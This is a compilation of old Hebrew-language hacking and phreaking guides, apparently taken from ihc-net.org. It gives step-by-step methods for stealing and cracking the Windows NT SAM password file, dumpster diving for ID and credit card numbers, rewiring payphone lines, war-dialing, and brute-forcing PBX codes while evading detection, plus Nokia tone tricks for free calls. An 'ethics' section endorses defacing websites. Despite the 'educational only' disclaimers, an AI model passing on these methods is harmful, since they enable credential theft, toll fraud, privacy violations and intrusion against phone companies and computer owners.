‫במה להצטייד?‬
‫ציוד חובה‪:‬‬
‫‪ -‬דיסקט‬
‫ציוד רשות‪:‬‬
‫‪ -‬דיסקט ‪ntfsdos‬‬
‫‪nt resource kit -‬‬
‫אז ככה‪:‬‬
‫איך לחפש את קובץ הסיסמאות?‬

‫פשוט ככה‪:‬‬
‫אם זה ‪ winnt 4.0‬ומטה‪ ,‬חפשו את הקובץ _‪sam.‬‬

‫אם זה ‪ winnt5.0‬ומעלה‪ ,‬חפש את הקובץ ‪sam‬‬
‫מהו ה‪?sam-‬‬
‫ראשי התיבות של ‪ sam‬הם ‪security accounts manager‬‬

‫או בעברית‪ :‬מנהל אבטחת חשבונות‪.‬‬
‫יש כמה שיטות לפרוץ את הקובץ הזה‪.‬‬
‫שיטה ‪ :1‬תנסו להשיג את התוכנה ‪ .r-disk‬זאת לא תוכנת פריצה‪ ,‬תוכנה זאת‪ ,‬של מיקרוסופט‬
‫בעצמה‪ ,‬מגבה את כל המידע הנחוץ של מערכת ההפעלה על דיסקט‪ .‬זה‬
‫כולל גם סיסמאות! פשוט השתמשו בתוכנה על מנת להשיג את הקובץ‪.‬‬
‫שיטה ‪ :2‬הסיסמאות הכי מעודכנות נמצאות בתיקיה ‪ .winnt/system32/config‬גם כן הם על _‪sam.‬‬

‫או על ‪.sam‬‬
‫אבל למשתמש רגיל‪ ,‬מה שאנחנו (בינתיים) אין גישה לשם‪.‬‬
‫אל דאגה! פשוט השתמשו בדיסקט ‪ ntfsdos‬כשאתם עושים ‪.restart‬‬
‫עכשיו תוכלו להכנס לספריה הזאת ולהעתיק את הקובץ לדיסקט‪.‬‬
‫שיטה ‪ :3‬עותק של הסיסמאות נמצא גם ב‪ ,registry‬אבל משתמש רגיל לא יכול להכנס אליו‪.‬‬
‫מה אפשר לעשות? להשתמש בתוכנה (שוב‪ ,‬מבית מיקרוסופט) ‪ regback.exe‬מה ‪nt resource kit‬‬
‫שמעתיקה את הסיסמאות לדיסקט‪.‬‬
‫שיטה ‪:4‬‬
‫*** שיטה זאת מיועדת רק למומחים ולאלה שלא מוותרים בקלות‪.‬‬
‫בקובץ ה‪ swap‬של ‪ winnt‬מאוחסנות הסיסמאות בטקסט רגיל! אבל שוב‪ ,‬אי אפשר לחפש בו כי‬
‫המערכת משתמשת בו‪.‬‬
‫מה עושים? משתמשים ב‪ ntfsdos‬כדי להכנס ל‪ dos‬ומעתיקים את הקובץ ‪ swapfile.sys‬למקום אחר‬
‫על ההארד דיסק‪.‬‬
‫** שימו לב‪ :‬מעתיקים! לא מעבירים!‬
‫נכנסים לווינדוס ופשוט מחפשים בקובץ כשמשתמשים ב‪ notepad‬כדי לקרוא אותו‪.‬‬
‫לשיטה ‪ 2 ,1‬ו‪:3‬‬
‫עכשיו‪ ,‬כשיש לנו את הקובץ‪ ,‬אנחנו צריכים לפצח אותו‪ .‬הסיסמאות בתוכו מקודדות ואי אפשר‬
‫להשתמש בהם ככה‪.‬‬
‫מה עושים? מורידים תוכנה בשם ‪ l0phtcrack‬מ‪ www.l0pht.com‬ועוקבים אחרי ההוראות בה איך‬
‫להתחיל את תהליך הפיצוח‪.‬‬
‫עכשיו לכו לשחק עם החתול‪ ,‬להציק לאחות או סתם להמשיך לקרוא בזמן שהסיסמאות מופיעות‬
‫לאט לאט מול עינכים‪.‬‬
‫‪.by e-man‬‬
‫האתיקה של ההאקרים עפ"י ‪efraim abramov\oldhacker‬‬
‫”‪“they don't care about us‬‬

‫‪micheal jackson‬‬
‫אל תהיה אף פעם צבוע ‪ -‬להיות צבוע זה הדרגה הכי שפלה שיש באדם ‪ ,‬תהיה אמיתי ‪ ,‬אם אתה ‪1.‬‬
‫רוצה לומר למישהו אמת אמור לו את זה בפנים ואל תרמוז או תנסה להעביר את המסר ברמזים ‪,‬‬
‫‪ !.‬אמור זאת חד וחלק בפנים‬
‫אל תשקר ‪ -‬בעולם ההאקינג ובחיים בכלל אנשים שונאים שקרים ‪ ,‬פעם אחת ידעו ששיקרת יעיפו ‪2.‬‬
‫‪ .‬אותך מכל חברה שיש במיוחד בהאקינג שצריך אמינות רבה‬
‫אל תגנוב אף פעם כסף או רכוש מאדם ‪ -‬לדוגמה אל תגנוב מספרי אשראי של אנשים או חשבונות ‪3.‬‬
‫‪ ...:-( .‬בנקים ותשמש בהם לרע ‪ .‬זכורמה ששלמה ארצי שר ‪ :‬פוליטיקאים וגנבים הם‬
‫אל תתנשא ‪ -‬אל תתנשא בפני אף אחד על הדברים שלמדת מאחרים ואל הדברים שאתה יודע בכלל ‪4.‬‬
‫אלא למד את מי שלא יודע כמו שלימדו אותך וכמו שהספר הזה עושה ‪ ,‬זכור ‪ :‬תמיד יש מישהו שיודע‬
‫‪ .‬יותר טוב ממך ‪ ,‬ובכלל כל המטרה של ההאקרים זה להפיץ את הידע בחינם לכל דורש‬
‫הזהר ורק אח"כ בצע ‪ -‬אם אתה רוצה לפרוץ לאתר שאותו אתה לא כל כך אוהב הזהר את בעל ‪5.‬‬
‫האתר ואמור לו שיוריד את האתר מהרשת ואם הוא לא עושה את דבריך פרוץ את האתר בלי רגשות‬
‫‪ .‬אשמה‬
‫תהיה בן אדם ‪ -‬זכור שהקהילה של האינטרנט היא חברה בדיוק כמו בחיים אלא שברשת אתה ‪6.‬‬
‫‪ .‬אנונומי ולמרות זה תתנהג כמו בן אדם ולא כמו פרא‬
‫‪ .‬בשביל כבוד צריך לעבוד‪7.‬‬
‫‪ " .‬זכור ‪ " :‬מעפר באת ולעפר תשוב ‪8.‬‬
‫‪by efraim abramov \ old-hacker‬‬

‫שקר \ אמת ‪ -‬פריקינג‬
‫‪.‬שקר‪ :‬תופעת הפריקינג מתה‬

‫‪.‬אמת‪ :‬תופעת הפריקינג היא בדעיכה רצינית‪ ,‬אפשר להגיד גוססת‪ ,‬היא לא מה שהייתה בעבר‬
‫‪ )boxes(.‬שקר‪ :‬קופסות פריקרים לא עובדות יותר‬

‫‪.‬אמת‪ :‬כמעט כל הקופסאות לא עובדות אבל יש כמה שעובדות תחת התנאים הנכונים‬
‫‪.‬שקר‪ :‬פריקינג טוב‪/‬מגניב יותר מהאקינג‬

‫‪.‬אמת‪ :‬גם האקינג‪/‬פריקינג‪ ,‬שניהם סוגים של אומנות ממוחשבת ואין דבר כזה טוב יותר מהשני‬
‫‪.‬שקר‪ :‬פריקינג זה דבר רע ואסור‬

‫‪.‬אמת‪ :‬פריקינג זה דבר רע ואסור רק אם עושים בזה שימוש מוטעה ומכוון להרוס דברים‬
‫? שקר‪ :‬אין שימוש לפריקיג‪ ,‬למה צריך את זה בכלל‬

‫אמת‪ :‬פריקינג יכול להיות שימושי מאוד והוא נותן לך ידע על מערכות טלפון שאתה משתמש בהם כל‬
‫‪.‬יום‬
‫‪.‬שקר‪ :‬הנושא העיקרי של פריקינג הוא רק קופסאות‬

‫‪,‬אמת‪ :‬כל יום כאשר נוצרת מערכת טלפון חדשה‪ ,‬יש תת‪-‬נושא חדש לפריקינג‬
‫‪.‬איך לעבוד איתה ומה אפשר לעשות איתה‪ ,‬ידע חדש על מערכת חדשה‬
‫‪.‬שקר‪ :‬פריקינג הוא בטיחותי ביותר‬

‫‪.‬אמת‪ :‬לא נכון‪ ,‬תמיד יש סיכוי שתתחשמל בזמן ביצוע מעשה כלשהו‪ ,‬תמיד צריך להיזהר‬
‫‪.‬שקר‪ :‬כשאני עושה מעשה פריקינג כלשהו‪ ,‬אין לי סיכוי להיתפס‬

‫‪.‬אמת‪ :‬גם לא נכון‪ ,‬תמיד יש סיכוי שמישהו יראה אותך‪ ,‬יתקשר ל ‪ 100‬ואתה נתפס ואוכל אותה‬
‫‪.‬שקר‪ :‬פריקינג זה לא חוקי‬

‫‪.‬אמת‪ :‬זה דווקא אמת‬
‫‪.‬שקר‪ :‬אם אני אקרא את הטקסט הזה אני אהיה פריקר טוב‬
‫‪.‬אמת‪ :‬שוב לא נכון‪ ,‬הטקסט נועד להסביר לכם מעט מידע על פריקינג ואיך להיזהר במעשיכם‬
‫‪by prising‬‬
‫חיפוש במזבלות לפריקרים‬
‫חיפוש במיזבלות לפריקרים‬
‫‪: www.ihc-net.org‬אתר המקור‬
‫‪.‬הערות‪ :‬אני וצוות האתר לא אחראים לכל שימוש לרעה בטקסט‬

‫‪.‬החומר כאן הוא למטרות לימודיות בלבד ואין לבצע את המתואר בטקסט‬
‫?מה זה חיפוש במיזבלות לפריקרים‬

‫הכוונה הוא לחיפוש לניירות (לא בשום דבר מגעיל אני מקווה) במקומות שבהם אפשר‬
‫‪(.‬למצוא מידע לפריקרים‪/‬האקרים (בעיקר במשרדי חברת הטלפון‬
‫?למה לי? מה אני ימצא‬

‫‪:‬אפשר למצוא הרבה דברים‪ ,‬חלקם לפריקרים וחלקם להאקרים‪ .‬הנה רשימה חלקית‬
‫‪.‬ניירות עם מספרי ניסוי של חברת הטלפון *‬
‫‪.‬ניירות עם תיאור השיחות ממספר מסויים *‬
‫‪.‬מספרי תעודת‪-‬זהות ושאר פרטים אישיים של אנשים שונים *‬
‫‪.‬מספרי כרטיסי אשראי של אנשים אחרים על פיתקיות *‬
‫‪.‬מספרי חיוג לרשת שאתה לא אמור לדעת עליהם *‬
‫?מה צריך‬
‫‪////////‬‬
‫(חולצה ישנה ארוכה‪ ,‬נעליים ישנות וזוג מכנסיים ישנים‪( .‬הכול בצבע כהה &‬
‫פנס &‬
‫תיק גדול לניירות &‬
‫‪& walkie talkie‬‬
‫‪ walkie talkie‬חברים (בין ‪ )2-6‬לפחות אחד נמצא בתצפית עם &‬
‫?אוקי‪ ,‬אז מה אני עושה כדי להשיג את זה‬

‫((((((((((((((((((())))))))))))))))))‬
‫קודם כול לך למקום שאתה רוצה לחפש בו (עדיף משרדים של בזק‪ /‬חברות טלפון סלולרי) בזמן האור‬
‫‪.‬ותראה איך המקום נראה‪ ,‬מאיפה נכנסים ואם יש שומרים בחוץ או מנעולים‬
‫‪.‬בלילה לאחר מכן‪ ,‬לך למקום ותיכנס למיזבלה‬
‫‪.‬שם אתה תראה המון פחים גדולים אחד ליד השני‪ ,‬פתח אותם ותסתכל פנימה‬
‫‪.‬רוב מה שתראה הוא נייר‪ ,‬ומה שאתה צריך זה ניירות אז קח הרבה ניירות לתוך התיק וצא מהמקום‬
‫כשאתה מגיע הביתה תסתכל על מה שלקחת‪ ,‬זרוק את הדברים הלא חשובים לפח זבל ברחוב כלשהו‬
‫((לא שלך‬
‫‪.‬וקח את הדברים המעניניים באמת‬
‫אם תמצא דברים מעניניים ממש תוכל לסרוק את זה ולשלוח לי‪ ,‬פינת הפריקינג זקוקה לדברים‬
‫!כאלה‬
‫‪...‬מה אם‬
‫‪:‬תירוצים לשהייה במיזבלה‬
‫‪.‬איבדתי את הכדורגל שלי כאן ‪#‬‬
‫‪.‬אני מחפש ניירות‪/‬אלומיניום למיחזור ‪#‬‬
‫‪.‬אני צריך חוטי טלפון לפרויקט שלי במדעים ‪#‬‬
‫‪.‬אין לי מקום לישון ‪#‬‬
‫‪,‬בכל מקרה‪ ,‬אם תופסים אותך ומבינים מה אתה עושה‬
‫‪.‬אתה יכול להיות מואשם בחציית גבול ולא בשום פשע רציני‬
‫‪,‬תמיד שלכם‬
‫‪by aiti‬‬
‫‪tni box‬‬
‫‪tni box‬‬
‫=======‬
‫‪ - boba smith‬נכתב על ידי‬

‫‪version - 4.0‬‬
‫<<< ‪>>> www.ihc-net.org‬‬
‫הערה‬
‫‪----‬‬
‫טקסט זה נכתב למטרות לימודיות בלבד‬

‫אין לי שום אחריות לכל נזק שנגרם עקב קריאת טקסט זה‬
‫תוכן עניינים‬
‫‪------------‬‬
‫‪ tni box‬מה זה ה ‪1.‬‬

‫מה אפשר לעשות איתה ‪2.‬‬
‫? איך אפשר למצוא כאלה קופסאות ‪3.‬‬
‫נתחיל ‪4.‬‬
‫הערות ‪5.‬‬
‫קרדיטים ‪6.‬‬
‫‪ tni box‬מה זה ה ‪1.‬‬

‫‪------------------‬‬
‫( וכל אלה ‪ blue‬זאת קופסא ( לא כמו הקופסאות ‪ tni box‬ה‬

‫שנמצאת ליד טלפון על מטבעות ( קשה למצוא כאלה קופסאות ‪ ,‬הקופסאות יכולות‬
‫( להיות מרוחקות מהטלפון‬
‫ולחפש את הקופסת ה‪tni‬‬
‫מה אפשר לעשות איתה ‪2.‬‬

‫‪---------------------‬‬
‫כאשר אתה מוצא את הקופסא אתה יכול לשנות את הקו לקו אמיתי ( לחשבון אמיתי‬
‫( בבזק ‪ ,‬ולא סתם איזה טלפון מזוין על מטבעות‬
‫? איך אפשר למצוא כאלה קופסאות ‪3.‬‬

‫‪--------------------------------‬‬
‫את הקופסאות האלה אתה יכול למצוא ליד טלפונים על מטבעות ( המרחק יכול‬
‫‪ ( .‬להיות רחוק מאד ‪ ,‬וזה גם יכול להיות קרוב מאד‬
‫‪ ,‬אם נגיד את הולך לטלפון ואתה רואה מן כזה חוט לאינשהוא תעקוב אחריו‬
‫‪ .‬או אם אתה רואה מן כזה חור שעליו נכנס חוט ‪ ,‬אז תנסה לעקוב אחריו‬
‫נתחיל ‪4.‬‬
‫‪--------‬‬
‫‪ .‬לך תחפש את הקופסא ותפתח אותה אם הכלים שאתה צריך ‪1.‬‬

‫אחרי שאתה פותח אותה אתה אמור לראות מן כאלה כבלים ‪2.‬‬
‫‪ .‬שרשום שם את המספרי טלפון‬
‫עכשיו ‪ ,‬תחפש את המספר של הטלפון על המטבעות ואז תחליף‬
‫‪ ( .‬אותו למספר אחר ( למספר רגיל‬
‫‪ .‬תלך לטלפון שאותו שיניתה לטלפון הרגיל ותתקשר חופשי לכל מקום בחינם ‪3.‬‬
‫הערות ‪5.‬‬
‫‪--------‬‬
‫זה נותן לך שיחות חינם ‪ beige box ,‬השיטה הזאת זה כמו ‪1.‬‬
‫‪ .‬ונותן לך לצותת לטלפון שעליו עליתה‬
‫שאתה מתחבר לקו הרגיל ‪ ,‬אז תתקשר ל ‪ 110‬זה ישמיע לך את המספר ‪2.‬‬
‫‪ .‬טלפון שעליו התחברת‬
‫אם נגיד אחרי שעשיתה את כל הקטע אם הקופסא ‪ ,‬שאתה תלך להתקשר ‪3.‬‬
‫‪ .‬לא יוכלו לחשוד בך ‪ ,‬אתה תראה כאילו שאתה מתקשר רגיל‬
‫‪by boba smith‬‬
‫רשימת המספרים המיוחדים והקידומות של נזק‬
‫&&& תודה שחייגתם‪ ,‬נזק‪ ,‬נזק &&&‬
‫הערות‪ :‬בקבוצה שלנו לא עושים מעשים בלתי‪-‬חוקיים וכל מידע כאן‬

‫‪.‬הוא למטרות לימודיות בלבד ו^^אין^^ לבצע את האמור בטקסט‬
‫‪.‬ואני חלק מקבוצה זה ‪ www.ihc-net.org‬קובץ זה הורד במקור מ‬
‫‪:‬רשימת המספרים‬
‫משטרה ‪100 -‬‬
‫מגן דויד אדום ‪101 -‬‬
‫מכבי האש ‪102 -‬‬
‫חברת החשמל ‪103 -‬‬
‫שירות לקוחות של נזק ‪199 -‬‬
‫פקס לשירות לקוחות של נזק ‪198 -‬‬
‫לטכנאי נזק ‪110 - ani‬‬

‫שירות יקיצה של נזק ‪175 -‬‬
‫רשות הדואר‪ ,‬שירות מברקים ‪171 -‬‬
‫שירות תיקונים של נזק ‪166 -‬‬
‫שירות תיקונים מיוחדים של נזק ‪164 -‬‬
‫שירות נזקנט‪ ,‬אינטרנט מזדמן ‪135 -‬‬
‫שירות אינטרנט מיוחד‪ ,‬שימוש לחברות שונות ‪136 -‬‬
‫התא קולי של הקו אליו אתה מחובר ‪151# -‬‬
‫שליחת פקסים לשירות תא קולי ‪153 -‬‬
‫מרכזייה בינלאומית ‪1822/1838/1848/188 -‬‬
‫ישראנט‪ ,‬תמסורת ממוחשבת ‪131 -‬‬
‫מודיעין ‪144 -‬‬
‫שירות גוביינא אוטומטית ‪142 -‬‬
‫השעון הדובר ‪155 -‬‬
‫מידע על מספרי טלפון מוחלפים ‪146 -‬‬
‫מוקד עירוני ‪106 -‬‬
‫הפעלת שירות עקוב אחרי ‪72 -‬‬
‫ביטל שירות עקוב אחרי ‪73 -‬‬
‫‪:‬כוכביות וסולמיות‬
‫חייג לאחרון שהתקשר אליך ‪42* -‬‬

‫שירות "חנייה" של נזק‪ ,‬למקרה שיש מספר תפוס ‪41* -‬‬
‫ביטל אפשרות *‪ 42‬ושיחה מזוהה למי שאתה מתקשר אליו ‪43* -‬‬
‫עקוב אחרי במקרה שתפוס ‪73* -‬‬
‫עקוב אחרי במקרה שתפוס או שאין מענה ‪74* -‬‬
‫*ביטול ‪#73 - 73‬‬
‫*ביטול ‪#74 - 74‬‬
‫‪:‬קידומות‬
‫שיחת חינם ‪1800 -‬‬

‫שיחת חינם‪ ,‬לא עובד ברוב אזורי הארץ ‪177 -‬‬
‫שיחה מכל הארץ בתשלום ‪1700 -‬‬
‫קוי זהב ‪012 -‬‬
‫ברק ‪013 -‬‬
‫נזק בינלאומי ‪014 -‬‬
‫שיחה מכל הארץ בתשלום ‪1212 -‬‬
‫אזור ירושלים ויהודה ושומרון ‪02 -‬‬
‫אזור גוש דן והמרכז ‪03 -‬‬
‫אזור חיפה והצפון ‪04 -‬‬
‫אזור השפלה והדרום ‪08 -‬‬
‫‪! ----‬למקרה שאתם מכירים עוד מספרים‪ ,‬אנא פנו אלי ‪----‬‬
‫‪,‬תמיד שלכם‬
‫‪by aiti‬‬
‫סריקת מספרי ‪1800‬‬
‫מה זה בכלל ‪?exhange scanning‬‬

‫‪ exhange scanning‬זה כמו דפיקה על כל הבתים ברחוב מסוים ‪ -‬רק שהפעם משתמשים בטלפון‪.‬‬
‫אתה בעצם סורק אזור מסוים של מספרי טלפון‪ ,‬נגיד מ‪ 1800-300-000‬עד ‪ 1800-300-999‬ומחפש‬
‫מספרים מענינים שאתה מוצא‪.‬‬
‫אפשר למצוא מספרי ניסוי שונים של חברת הטלפון‪ ,‬מספרי מודמים שניתן להתחבר אליהם (בעיקר‬
‫להאקרים) ועוד מספרים מענינים שונים‪.‬‬
‫מה אני צריך כדי לסרוק?‬

‫‪ #‬מחשב שיש בו מודם והוא מחובר לטלפון‬
‫‪ #‬את התוכנה ‪ phone tag‬שניתן למצוא באתר‪.‬‬
‫הורדתי את התוכנה‪ ,‬מה עכשיו?‬

‫קודם כל תפתח את התוכנה‪ .‬אתה תראה את המסך הבא‪:‬‬
‫תלחץ על ‪ file - new dial list‬ותקבל את המסך הבא‪:‬‬

‫עכשיו אתה צריך לבחור את טווח המספרים שאתה רוצה לבדוק אותם‪.‬‬
‫אני ממליץ לנסות מספרים של ‪ ,1800‬אבל הבחירה בידיכם‪.‬‬
‫הקישו את התבנית שאתה רוצים‪ ,‬לחצה על ‪ x‬תהיה כמו לחיצה על כל המספרים‪.‬‬
‫לחצו על ‪ ok‬ואז על‬
‫והמודם יתחיל לחייג…‬
‫בזמן שהוא מחייג אתם תראו על המסך את התוצאות‪.‬‬
‫כל מספר שנרשם כתפוס רוב הסיכויים שאין כזה מספר‪.‬‬
‫תרשמו כל מספר שלא נרשם כתפוס אלא נרשם כ‪ carrier‬או כ ‪no carrier‬‬
‫ולאחר מכן תתקשרו לכל המספרים הלא‪-‬תפוסים ותבדקו מה יש בהם‪.‬‬
‫הערות‪ :‬טקסט זה הוא למטרות לימודיות בלבד ואין להשתמש בו‪.‬‬

‫אני לא ממליץ לחייג מעל ‪ 500‬מספרים ביום אחד‪ ,‬בזק יכולה לעלות על זה‪.‬‬
‫אחרי כל סריקה שאתם עושים אתם שולחים את התוצאות אלי…‪.‬‬
‫ותזכרו‪ :‬זה חיוג חינם‪ ,‬אז תתחילו לסרוק!‬
‫‪by aiti‬‬
‫‪pbx‬‬
‫פעם (לפני ‪ 5‬שנים בערך) השתמשו הרבה אנשים בקודים שפורסמו ב‪ bbs‬כדי לעשות שיחות חינם‪,‬‬
‫אני מקווה שבטקסט זה אני "יחזיר עטרה ליושנה" (אוף‪ ...‬אני שונא את ש"ס)‬
‫מה זה בכלל כל הדברים האלו?‬

‫‪---------------------------‬‬
‫קודם כל צריך להבין שפי‪.‬בי‪.‬אקס זה לא מאריך‪ ,‬ומאריך זה לא פי‪.‬בי‪.‬אקס‪ ,‬לפעמים מתבלבלים‬
‫בשמות האלו מכיוון שהם משמשים לאותה מטרה‪ :‬לעשות שיחות חינם‬
‫מאריך בדרך כלל שייך לחברת שיחות בינלאומיות גדולה (בזק בינלאומי‪ ,‬קווי זהב‪ ,‬ברק) או חברת‬
‫טלפון בינלאומית‪,‬‬
‫למאריך בדרך כלל יש שתי מטרות‪:‬‬
‫‪ .1‬שאנשים המשלמים על השירות יוכלו להתקשר למספרי טלפון בעזרת קוד מסויים (כמו בזקכרט‪)...‬‬
‫‪ .2‬להוות מספר שאליו מתקשרים כאשר מוכרים לך כרטיס חיוג חד‪-‬פעמי‪ ,‬בו אתה מתקשר למספר‬
‫כלשהוא‪ ,‬מקיש את הקוד ומתקשר‪.‬‬
‫כל מספרי המאריכים נמצאים באזור החיוג חינם של ‪ ,1800‬ולא תוכל למצוא מאריכים באזורי חיוג‬
‫אחרים‪.‬‬
‫כדי למצוא מאריך כדי להשתמש בשיטת הסריקה שכתבתי עליה טקסט‪,‬‬
‫אם אתה מוצא מספר שכאשר אתה מתקשר אליו הוא נותן לך צליל חיוג‪ ,‬יש ‪ 99%‬שמצאת מאריך‪.‬‬
‫כמו כן מספר המבקש ממך את הקוד לחיוג‪ ,‬חייב להיות מאריך‪.‬‬
‫קודם כל צריך למצוא כמה ספרות יש בקוד‪ ,‬אבל בדרך כלל הקול האוטמוטי יגיד לך‪" :‬אנא הכנס את‬
‫הקוד בעל ה‪ 8‬ספרות שלך" וכך תדע כמה ספרות יש‪,‬‬
‫אך לפעמים לא ינתנו לך שום רמזים על מספר הסיפרות‪.‬‬
‫אוקי‪ ,‬עכשיו לפי‪.‬בי‪.‬אקס!‬

‫בדרך כלל פי‪.‬בי‪.‬אקס יהיה שייך לאיזו חברה גדולה‪ ,‬שבדרך כלל יש לה מרכזייה‪.‬‬
‫(דוגמא‪ :‬לאוניברסיטאות בטוח יש פי‪.‬בי‪.‬אקס מכיוון שהם גדולות‪ ,‬יש בהם לרוב שירות לעובדים של‬
‫להתקשר למספר כלשהוא‪ ,‬לתת קוד ולהתקשר למישהוא בנושא עבודה‪ ,‬ותמיד יש לאוניברסיטאות‬
‫מרכזייה)‬
‫בדרך כלל האנשים בחברה יצטרכו לחייג ‪ ,9‬או כל סיפרה אחרת כדי לקבל צליל חיוג‪.‬‬
‫הפי‪.‬בי‪.‬אקס הוא בעצם מספר‪ ,‬שעובדים בחברה אמורים להתקשר אליו ולהקיש את הקוד שלהם‪,‬‬
‫ואז הם יוכלו לחייג חינם למישהוא‪ ,‬למטרות עסקים‪.‬‬
‫פי‪.‬בי‪.‬אקס יכולים להימצא גם באזורי חיוג רגילים (‪ )03,04,08‬וגם באזור חיוג של שיחות חינם (‪.)1800‬‬
‫מאריכים יכולים בדרך כלל להתקשר רק למספרים בתוך הארץ‪,‬‬
‫לעמות זאת‪ ,‬פי‪.‬בי‪.‬אקסים יכולים להתקשר לכל מקום בעולם‪.‬‬
‫חלק ‪ :2‬איך לא להתגלות בפריצה למערכות האלה‬

‫=========================================‬
‫ל ‪ 99%‬מהמאריכים יש את האפשרות לאתר ברגע‪ ,‬ולמצוא את מי שהתקשר‪ ,‬לכן מאוד קשה‪/‬מסוכן‬
‫לפרוץ אליהם בלי שמנהלי המערכת לא ישימו לב‪.‬‬
‫היתרון של פי‪.‬בי‪.‬אקסים הוא שלרובם אין דרך מהירה לאתר‪ ,‬ןהדרך היחידה לאתר את המתקשר‬
‫היא לבדוק את הרישומים אצל בזק (‪ =cama‬סרט מגנטי המתעד כל מספר שאליו התקשרת‪ ,‬אמור‬
‫לשמש למטרות חיוב‪ ,‬אך עדיין ניתן לאתר בעזרתו את המתקשר‪ ,‬הוא קיים במערכות טלפון חדשות‬
‫בלבד)‬
‫מה לא לעשות‪ ( :‬או‪ :‬איך פריקרים נתפסים על הדברים האלה)‬

‫&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&‬
‫‪ .1‬אל תנסה קודים אחד אחרי השני לפי הסדר (‪ )...0001,0002,0003,0004‬אלא תערבבו את הקודים‬
‫כך שיהיו בסדר רנדומלי‪.‬‬
‫‪ .2‬אל תחייגו לאותו פי‪.‬בי‪.‬אקס‪/‬מאריך ‪ 400‬פעמים בשעה אחת‪ ,‬בדרך כלל ישימו לב לזה‪....‬‬
‫‪ .3‬שלא יהיו הפרשים קבועים בזמן בין השיחות‪ ,‬אלא הפרשים רנדומלים‪.‬‬
‫הדרך הכי טובה היא למצוא את הקוד בעזרת הטלפון‪ ,‬ללא שימוש במחשב אלא לנסות קודים רבים‬
‫בעצמך בזמן שאתה רואה סאות' פארק‪....‬‬
‫אם אתה מוצאים קודים‪ ,‬אל תשתגעו ואל תביאו אותם לכל אחד‪ ,‬כי כך הם ימותו מהר מאוד‪...‬‬
‫‪by aiti‬‬
‫המדריך ליצירת צלילים בנוקיה‬
‫‪:‬הערות‬
‫‪-====-‬‬
‫‪.‬מדריך זה נכתב לצורכי לימוד בלבד‪ ,‬ואין הכותב נושא אחריות כלשהי עקב קריאת מדריך זה‬
‫‪:‬מצרכים‬
‫=======‬
‫נוקיה מהסוג היישן ‪ - 2160\2120‬אם אתם לא יודעים על מה אני מדבר‪ ,‬זה הנוקיה המרובה והדוחה‬
‫‪...‬שהיה לכל הארץ לפני איזה שנתיים‬
‫ידיים‬
‫מוח‬
‫‪:‬הסבר‬
‫=====‬
‫בנוקיה **‪ 21‬לא לקחו בחשבון שיהיה מישהו משועמם שייגלה שיטה שהם משתמשים בה לצורכי‬
‫‪...‬מחקר ובדיקה‬
‫?מה נותנת לנו השיטה‬
‫‪...‬השיטה מאפשרת בעת הצמדת השפורפרת לטלפון מטבעות‪ ,‬להתקשר חינם לכל מקום בעולם‬
‫‪:‬פעולה‬
‫======‬
‫‪:‬תפעילו את המכשיר‪ ,‬לחצו על‬
‫‪menu‬‬
‫ויישר על הכפתור‬
‫‪snd‬‬
‫‪:‬אחר כך הוא יגיד לכם‬
‫‪location number:‬‬
‫‪ [dtmf].‬הכוונה למספר הזיכרון שאותו אתם רוצים לשמוע בצלילים‬
‫‪.‬נגיד אנחנו רוצים לחייג ליוסי‪ ,‬שנמצא אצלינו במספר זיכרון ‪33‬‬
‫‪ ok‬אז אנחנו מקישים ‪ 33‬ולוחצים על‬
‫‪...‬שהוא בעצם הכפתור של התפריט ‪ dtmf‬עכשיו יש לנו אפשרות ללחוץ על‬
‫‪...‬ואיזה פלא‪...‬המכשיר מפיק את צלילי המספרים של הטלפון של יוסי‬
‫עכשיו מה שנותר לנו‪ ,‬זה למצוא טלפון מטבעות ]שקלים[ ולהצמיד אליו את הרמקול של הפלאפון‬
‫‪...‬וגמרנו‬
‫‪...‬אתם צריכים לשמוע צליל חיבור‬
‫!!!תנסו את השיטה על הטלפון בבית‪ ,‬זה אמור לעבוד מכל מקום‪...‬והשיטה עובדת מעולה‬
‫!מה שכן‪ ,‬זה שצריך להיזהר שלא ייתפסו אותכם‪...‬כי אז אתם יכולים להיות עצורים על גניבה‬
‫אבל אל חשש‪....‬פשוט תגידו שאתם משמיעים לחבר שלכם את ההודעה שהחברה המחורמנת שלכם‬
‫‪...‬השאירה לכם אתמול בלילה‬
‫חשוב לציין‪ :‬השיטה נמצאה ביידיי‪...‬ואם היא לא תעבוד אצלכם‪ ,‬אז תשאירו לי הודעה בפורום‪...‬ועוד‬
‫משהו‪...‬סתם שתדעו‪...‬שרוב הטלפונים האלה נמצאים בפיצוחיות הקטנות ובקיוסקים‪...‬בדרך כלל‬
‫בחוץ‪ ,‬ובקניונים בצורת טלפון גדול ובדרך כלל בצבע צהוב‪...‬תהנו‬
‫‪:‬לסיכום‬
‫‪-------‬‬
‫נוקיה לא חשבה על זה שמישהו יימצא את השיטה ויידע איך להשתמש בה ולאיזה צורך‪ ,...‬אבל‬
‫נוקיה טעתה‪...‬אבל בדגמי הנוקיה החדשים האפשרות הזאת מבוטלת‪...‬כנראה הם קיבלו קצת שכל‬
‫‪...‬האנשים‬
‫‪:‬לפריקרים‬
‫=========‬
‫שאתם צריכים בפשטות רבה‪...‬בלי שום טייפים ‪ hertz‬אתם יכולים עכשיו ליצור את ה‬
‫‪...‬ובלאגנים‪...‬למרות שהטייפ הטוב והיישן עדיין שולט בנו‬
‫‪by cntax‬‬
‫‪:‬רשימת הקופסאות השונות ותפקידם‬
‫אמור לגנוב שיחה ממתינה‪ ,‬שיחה מזוהה ושיחת ועידה במערכות טלפון ישנות* ‪acrylic box -‬‬
‫‪.‬שימוש בקו הטלפון של מישהו אחר ללא רשותו‪ ,‬אחד מהכלים של טכנאי בזק ‪beige box -‬‬
‫‪.‬מי שיתקשר אליך כאשר אתה משתמש בקופסא זו לא יחוייב על השיחה* ‪black box -‬‬
‫!אמור להרוס כל מערכת טלפון באזור‪ ,‬אל תשתמשו בזה ‪blotto box -‬‬
‫‪.‬משתמש בטונים כדי לקבל שיחות חינם לכל העולם* ‪blue box -‬‬
‫‪.‬אמור להרוס את יכולת התקשורת של הטלפון אצל מי ששותלים את הקופסא ‪busy box -‬‬
‫‪.‬משתמש בחשמל בטלפון שלך למטרות אחרות לפי בחירתך ‪chartreuse box -‬‬
‫אמור להפוך את הטלפון שלך לטלפון ציבורי* ‪cheese box -‬‬
‫‪.‬משמש ככפתור "המתן" לטלפון שלך ‪crimson box -‬‬
‫‪ coin collect, coin return, ringback‬נותן לך ליצור את הצלילים של* ‪green box -‬‬
